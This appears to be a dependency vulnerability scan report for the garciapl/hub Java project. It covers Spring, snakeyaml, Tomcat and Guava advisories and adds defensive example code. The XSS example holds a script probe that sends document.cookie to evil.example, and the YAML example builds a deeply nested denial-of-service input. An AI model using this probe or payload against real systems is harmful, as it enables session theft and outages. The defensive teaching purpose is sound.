  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-web@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-core@4.3.13.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.4.12.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE

…and 24 more

Overview

org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.

Affected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.

Remediation

Upgrade org.springframework:spring-core to version 5.3.12, 5.2.18 or higher.

References

medium severity

Stack-based Buffer Overflow

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.yaml:snakeyaml@1.17
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow when parsing crafted untrusted YAML files, which can lead to a denial-of-service.

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

low severity

Information Exposure

  • Vulnerable module: commons-codec:commons-codec
  • Introduced through: org.apache.httpcomponents:httpclient@4.5.3

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.apache.httpcomponents:httpclient@4.5.3 commons-codec:commons-codec@1.9

Overview

commons-codec:commons-codec is a package that contains simple encoder and decoders for various formats such as Base64 and Hexadecimal.

Affected versions of this package are vulnerable to Information Exposure. When a Base32 string does not correspond to any byte array value that would encode to it, the Base32 implementation does not reject it, and instead decodes it into an arbitrary value which can be re-encoded using the same implementation. This allows for information exposure exploits such as tunneling additional information via seemingly valid Base32 strings.

Remediation

Upgrade commons-codec:commons-codec to version 1.14 or higher.

References

low severity

HTTP Request Smuggling

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to HTTP Request Smuggling because malformed requests containing an invalid Content-Length header are not properly rejected.

Note: Exploiting this vulnerability is also possible if Tomcat is located behind a reverse proxy that likewise fails to reject the request with the invalid header.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.53, 9.0.68, 10.0.27, 10.1.1 or higher.

References

low severity

Information Exposure

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.13.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.13.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Information Exposure due to a concurrency bug that could cause client connections to share an Http11Processor instance, resulting in responses, or partial responses, being received by the wrong client.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.78, 9.0.62, 10.0.20, 10.1.0-M14 or higher.

References

low severity

Stack-based Buffer Overflow

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.yaml:snakeyaml@1.17
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow when parsing crafted untrusted YAML files, which can lead to a denial-of-service.

Remediation

Upgrade org.yaml:snakeyaml to version 1.32 or higher.

References

low severity

Stack-based Buffer Overflow

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.yaml:snakeyaml@1.17
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow in org.yaml.snakeyaml.constructor.BaseConstructor.constructObject when parsing crafted untrusted YAML files, which can lead to a denial-of-service.

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

low severity

Stack-based Buffer Overflow

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.yaml:snakeyaml@1.17
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow when supplied with untrusted input, due to improper limits on incoming data.

Remediation

Upgrade org.yaml:snakeyaml to version 1.32 or higher.
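The three snakeyaml findings above all come down to the same thing: the parser the project ships (1.17) has no bound on nesting, and the 1.32+ releases add one. The following is an added example, not code from the advisories or from garciapl/hub, showing the unbounded parser beside a hardened configuration. It assumes org.yaml:snakeyaml 2.x on the classpath (LoaderOptions limits, SafeConstructor(LoaderOptions)); the nesting limit of 20 and the 1 MiB size cap are values chosen for this example, and the nested payload is constructed inline.

```java
import java.util.Map;
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class YamlHardening {

    // Constructed payload: a flow sequence nested far deeper than any legitimate config.
    // On an unbounded parser each level costs stack frames until the thread dies.
    static String nestedPayload(int depth) {
        StringBuilder sb = new StringBuilder(depth * 2);
        for (int i = 0; i < depth; i++) sb.append('[');
        for (int i = 0; i < depth; i++) sb.append(']');
        return sb.toString();
    }

    // Weak form: default options and default constructor. On the 1.17 release used by
    // this project the default constructor also resolves arbitrary Java types from
    // !!tags, which is a separate remote-code-execution vector.
    static Yaml weakParser() {
        return new Yaml();
    }

    // Hardened form: SafeConstructor restricts tags to the standard YAML types, and
    // LoaderOptions caps nesting depth, input size and alias expansion.
    static Yaml hardenedParser() {
        LoaderOptions opts = new LoaderOptions();
        opts.setNestingDepthLimit(20);           // legitimate config rarely nests this deep
        opts.setCodePointLimit(1024 * 1024);     // 1 MiB input ceiling
        opts.setMaxAliasesForCollections(50);    // bounds "billion laughs" alias expansion
        opts.setAllowRecursiveKeys(false);
        return new Yaml(new SafeConstructor(opts));
    }

    public static void main(String[] args) {
        String payload = nestedPayload(10_000);

        try {
            weakParser().load(payload);
        } catch (StackOverflowError e) {      // what the 1.17 parser on this page does
            System.out.println("weak parser: StackOverflowError");
        } catch (YAMLException e) {           // 2.x default limit (50) also rejects it
            System.out.println("weak parser: " + e.getMessage());
        }

        Yaml safe = hardenedParser();
        try {
            safe.load(payload);
            System.out.println("unexpected: payload accepted");
        } catch (YAMLException e) {
            // Expected: nesting limit exceeded, surfaced as an ordinary parse error
            System.out.println("hardened parser rejected: " + e.getMessage());
        }

        // Ordinary input still loads with the hardened parser.
        Map<String, Object> cfg = safe.load("server:\n  port: 8080\n");
        System.out.println(cfg);
    }
}
```

The limit is enforced while composing nodes, before the constructor recurses, so the failure is a catchable YAMLException rather than a StackOverflowError that unwinds through whatever request thread was parsing.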

References

low severity

Cross-site Scripting (XSS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.21.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.21.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the SSI printenv command.

Note: Server Side Includes (SSI) support is disabled by default, and the printenv command is intended for debugging purposes only, so an application is exposed only if it has explicitly enabled SSI.

Details

A cross-site scripting attack occurs when an attacker gets a web application to include attacker-controlled content in a page it serves to other users, without that content being validated or encoded for the context it lands in.

Because the injected script is delivered by the trusted site, the victim's browser executes it with the site's own origin (as JavaScript, or as HTML that loads script), so it can perform actions that the browser's Same Origin Policy would otherwise block for a third-party page.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be delivered:

Type        Origin   Description
Stored      Server   The attacker persists the payload in the application's own data (a comment, profile field or message). The server includes it in pages it builds, so every user who views that content runs the code.
Reflected   Server   The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user's browser.
DOM-based   Client   Client-side script in the page reads attacker-controlled data (for example from the URL fragment) and writes it into the DOM without encoding. The payload never has to reach the server.
Mutated     Client   The attacker injects code that appears safe, but is then rewritten and modified by the browser while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Treat every value taken from an HTTP request as untrusted: validate it against what the field is supposed to contain, and encode it for the context it is written into before echoing it back, for example the search term reflected into a results page.
  • Encode output per context: HTML-entity encode &, <, >, " and ' in HTML text and attributes; URL-encode values placed into URLs or query strings; JavaScript-encode values placed inside script blocks. Stripping a fixed list of characters such as ?, / and spaces is not a substitute for context-aware encoding.
  • Give users the option to disable client-side scripts.
  • Reject or redirect malformed requests rather than reflecting their contents into an error page.
  • Limit what a stolen session is worth: mark session cookies HttpOnly, and detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
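As an added example of the output-encoding and Content Security Policy points above (not code from the advisory, from Tomcat or from the garciapl/hub project), the following shows a handler that reflects a query parameter verbatim beside its encoded form, plus a servlet filter that sets a CSP. It uses the javax.servlet API that Spring Boot 1.5 ships with; the search handler, the CspFilter and the probe string are constructed for this example, and filter registration (FilterRegistrationBean or @WebFilter) is left out.

```java
import java.io.IOException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletResponse;

public class XssDefenses {

    // Vulnerable form: reflects the query parameter into the HTML body unchanged.
    static String vulnerableSearchPage(String q) {
        return "<h1>Results for " + q + "</h1>";
    }

    // Hardened form: encode for the HTML text context before reflecting.
    static String safeSearchPage(String q) {
        return "<h1>Results for " + escapeHtml(q) + "</h1>";
    }

    // Entity-encodes the five characters that can change HTML structure. This is correct
    // for text nodes and quoted attribute values; a value placed into a URL or inside a
    // <script> block needs URL or JavaScript encoding instead, not this function.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Defence in depth: a policy that forbids inline script, so a payload that slips
    // past encoding still cannot execute. Adjust script-src if the app loads a CDN.
    public static class CspFilter implements Filter {
        static final String POLICY =
            "default-src 'self'; script-src 'self'; object-src 'none'; "
          + "base-uri 'self'; frame-ancestors 'none'";

        @Override public void init(FilterConfig config) {}
        @Override public void destroy() {}

        @Override
        public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
                throws IOException, ServletException {
            ((HttpServletResponse) res).setHeader("Content-Security-Policy", POLICY);
            chain.doFilter(req, res);
        }
    }

    public static void main(String[] args) {
        // Constructed attacker input: the classic cookie-exfiltration probe.
        String probe = "<script>document.location='http://evil.example/?c='+document.cookie</script>";
        System.out.println(vulnerableSearchPage(probe)); // script element reaches the browser intact
        System.out.println(safeSearchPage(probe));       // &lt;script&gt;... is rendered as text
    }
}
```

Encoding fixes the page; the CSP limits the blast radius of the next encoding mistake, which is why both are listed.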

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.18, 8.5.40, 7.0.94 or higher.

References

low severity

Creation of Temporary File in Directory with Insecure Permissions

  • Vulnerable module: com.google.guava:guava
  • Introduced through: com.google.guava:guava@21.0

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 com.google.guava:guava@21.0
    Remediation: Upgrade to com.google.guava:guava@32.0.0-android.

Overview

com.google.guava:guava is a set of core libraries that includes new collection types (such as multimap and multiset), immutable collections, a graph library, functional types, an in-memory cache and more.

Affected versions of this package are vulnerable to Creation of Temporary File in Directory with Insecure Permissions due to the use of Java's default temporary directory for file creation in FileBackedOutputStream. Other users and apps on the machine with access to the default Java temporary directory can access the files created by this class. This more fully addresses the underlying issue described in CVE-2020-8908, by deprecating the permissive temp file creation behavior.

NOTE: Even though the security vulnerability is fixed in version 32.0.0, the maintainers recommend using version 32.0.1, as version 32.0.0 breaks some functionality under Windows.

Remediation

Upgrade com.google.guava:guava to version 32.0.0-android, 32.0.0-jre or higher.

References

low severity

Information Disclosure

  • Vulnerable module: com.google.guava:guava
  • Introduced through: com.google.guava:guava@21.0

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 com.google.guava:guava@21.0
    Remediation: Upgrade to com.google.guava:guava@30.0-android.

Overview

com.google.guava:guava is a set of core libraries that includes new collection types (such as multimap and multiset), immutable collections, a graph library, functional types, an in-memory cache and more.

Affected versions of this package are vulnerable to Information Disclosure. The file permissions on the file created by com.google.common.io.Files.createTempDir allow an attacker running a malicious program co-resident on the same machine to steal secrets stored in this directory. This is because, by default, on unix-like operating systems the /tmp directory is shared between all users, so if the correct file permissions aren't set by the directory/file creator, the file becomes readable by all other users on that system.

PoC

import java.io.File;
import java.nio.file.Files;
import java.nio.file.attribute.PosixFilePermissions;

File guavaTempDir = com.google.common.io.Files.createTempDir();
System.out.println("Guava Temp Dir: " + guavaTempDir.getName());
runLS(guavaTempDir.getParentFile(), guavaTempDir); // Prints the file permissions -> drwxr-xr-x
File child = new File(guavaTempDir, "guava-child.txt");
child.createNewFile();
runLS(guavaTempDir, child); // Prints the file permissions -> -rw-r--r--

// runLS is not defined in the advisory; this assumed equivalent prints the rwx bits of the ls -l output.
static void runLS(File dir, File f) throws Exception {
    System.out.println(dir.getName() + "/" + f.getName() + " " + PosixFilePermissions.toString(Files.getPosixFilePermissions(f.toPath())));
}

For Android developers, choosing a temporary directory API provided by Android is recommended, such as context.getCacheDir(). For other Java developers, we recommend migrating to the Java 7 API java.nio.file.Files.createTempDirectory() which explicitly configures permissions of 700, or configuring the Java runtime's java.io.tmpdir system property to point to a location whose permissions are appropriately configured.
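The following is an added example (not the Guava maintainers' code nor garciapl/hub's) that puts the deprecated Guava call beside the java.nio replacement recommended above, and adds a check a practitioner can run against any directory the application writes secrets into. It assumes Guava on the classpath for the weak call and a POSIX file system for the permission check; on Windows getPosixFilePermissions throws UnsupportedOperationException, and the "hub-" prefix is arbitrary.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.attribute.FileAttribute;
import java.nio.file.attribute.PosixFilePermission;
import java.nio.file.attribute.PosixFilePermissions;
import java.util.EnumSet;
import java.util.Set;

public class TempDirHardening {

    // Weak form (what CVE-2020-8908 describes): Guava 21 creates the directory under
    // java.io.tmpdir with the process umask, typically 0755, so any local user can
    // list and read it.
    static File weakTempDir() {
        return com.google.common.io.Files.createTempDir();
    }

    // Hardened form: java.nio creates the directory atomically with explicit 0700
    // permissions, so no other local user can traverse it. The attribute is
    // unsupported on non-POSIX file systems, so fall back to the platform default there.
    static Path hardenedTempDir() throws IOException {
        try {
            FileAttribute<Set<PosixFilePermission>> ownerOnly =
                PosixFilePermissions.asFileAttribute(PosixFilePermissions.fromString("rwx------"));
            return Files.createTempDirectory("hub-", ownerOnly);
        } catch (UnsupportedOperationException e) {
            return Files.createTempDirectory("hub-");
        }
    }

    // True only if neither group nor others hold any permission bit on the path.
    static boolean isOwnerOnly(Path path) throws IOException {
        Set<PosixFilePermission> perms = Files.getPosixFilePermissions(path);
        Set<PosixFilePermission> ownerBits = EnumSet.of(
            PosixFilePermission.OWNER_READ,
            PosixFilePermission.OWNER_WRITE,
            PosixFilePermission.OWNER_EXECUTE);
        return ownerBits.containsAll(perms);
    }

    public static void main(String[] args) throws IOException {
        File weak = weakTempDir();
        Path hard = hardenedTempDir();
        System.out.println(weak + " owner-only=" + isOwnerOnly(weak.toPath())); // false with umask 022
        System.out.println(hard + " owner-only=" + isOwnerOnly(hard));          // true

        // Files inside do not inherit the directory mode; create them explicitly too.
        Path secret = Files.createFile(hard.resolve("token"),
            PosixFilePermissions.asFileAttribute(PosixFilePermissions.fromString("rw-------")));
        System.out.println(secret + " owner-only=" + isOwnerOnly(secret));     // true

        Files.delete(secret);
        Files.delete(hard);
        weak.delete();
    }
}
```

The isOwnerOnly check is worth running in a startup self-test when the application keeps tokens or key material on local disk: a directory created correctly but later chmod'ed by an operator fails it just as loudly.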

Remediation

There is no fix for com.google.guava:guava. However, in version 30.0 and above, the vulnerable functionality has been deprecated. In order to mitigate this vulnerability, upgrade to version 30.0 or higher and ensure your dependencies don't use the createTempDir or createTempFile methods.

References

low severity

Session Fixation

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.12.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.12.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Session Fixation. When using FORM authentication there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability.
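The defence against session fixation is to issue a new session identifier at the moment a request becomes authenticated, so an identifier the attacker planted beforehand maps to nothing afterwards. Tomcat's own FORM authenticator does this and the advisory's window lies inside that code, which only the upgrade closes; for an application-managed login the same rotation is the developer's job. The servlet below is an added example (not from the advisory, Tomcat or garciapl/hub) using the Servlet 3.1 changeSessionId() call available in Tomcat 8.5; the credential check is a stand-in with hard-coded values.

```java
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

public class LoginServlet extends HttpServlet {

    // Hypothetical credential check; a real one verifies a salted hash in constant time.
    static boolean credentialsValid(String user, String password) {
        return "alice".equals(user) && "correct horse battery staple".equals(password);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String user = req.getParameter("username");
        String password = req.getParameter("password");
        if (!credentialsValid(user, password)) {
            resp.sendError(HttpServletResponse.SC_UNAUTHORIZED);
            return;
        }

        // Weak form would be: req.getSession(true).setAttribute("user", user);
        // which leaves the pre-login JSESSIONID, possibly chosen by the attacker, valid
        // for the authenticated session.
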